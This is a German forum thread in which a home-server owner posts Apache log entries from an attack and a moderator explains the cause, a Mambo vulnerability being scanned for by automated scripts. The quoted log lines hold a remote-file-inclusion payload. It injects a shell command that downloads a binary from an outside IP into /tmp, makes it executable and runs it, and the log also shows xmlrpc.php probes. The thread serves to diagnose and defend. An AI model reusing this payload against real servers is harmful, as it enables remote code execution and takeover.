Apache und Sicherheit

Alles, was den Apache betrifft, kann hier besprochen werden.

Apache und Sicherheit

Postby Anime » 08. June 2006 16:34

Hallo und einen lieben....


Ich bin gerade ein bissle auf dem Schlauch und zwar folgendes: Irgendwer oder was versucht seit einger Zeit meinen Server zu häcken das mich jetzt dazu veranlassen lies seit gestern die Verbindung zu Dynalias zu kappen.

Sprich wenn ich mich ins Netzt einwähle dann aktualisiert sich nicht meine Dyndomäne und folglich erfahrt auch niemand meine Aktuelle Ip.

Ich hoffe das mein Verständnis soweit bis jetzt richtig ist.

Heute aber sah ich wieder jemanden bei mir herum schwirren mit folgender Log Eintragung und kann mir aber nicht erklären wie er nun meinen Rechner finden konnte.
Habt ihr vielleicht eine Erklärung dafür?

Code: Select all
203.109.147.171 - - [08/Jun/2006:16:32:52 +0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:32:54 +0200] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 200 18527
203.109.147.171 - - [08/Jun/2006:16:32:55 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:32:56 +0200] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:32:58 +0200] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:32:59 +0200] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:33:01 +0200] "POST /xmlrpc.php HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:33:02 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:03 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:05 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:06 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:08 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:09 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:10 +0200] "POST /xmlrpc.php HTTP/1.1" 404 1130
203.109.147.171 - - [08/Jun/2006:16:33:12 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 -
203.109.147.171 - - [08/Jun/2006:16:33:13 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 -
Anime
 
Posts: 44
Joined: 16. May 2006 18:48

Postby deepsurfer » 08. June 2006 17:28

Seit zwei Tagen sind ScriptKiddis unterwegs die alle möglichen Server über eine MAMBOO Sicherheitslücke angreifen.

Also zuerst bei Mamboo vorbeischaun ob schon ein Patch da ist.

Das dich Leute auch ohne DynDNS finden hängt schlicht und ergreifend daran das deine IP als solches im Internet bekannt ist.

Es gibt scripte die einfach IPranges abgrasen und sobald sich dort etwas meldet wird der angriff gestartet.


Desweiteren kann es sogar sein das derjenige der die IP vor dir hatte auch einen Mambo laufen lies und du jetzt nur einen veraltetetn Request aus dem Internet bekommst. daher auch die 400
chirio Deep
Wie sagte einst der MCP aus Tron auf dem Bildschirm zu schreiben Pflegte
" ... end of communication ... "
User avatar
deepsurfer
AF Moderator
 
Posts: 6440
Joined: 23. November 2004 10:44
Location: Cologne
Operating System: Win-XP / Win7 / Linux -Debian


Return to Apache

Who is online

Users browsing this forum: No registered users and 2 guests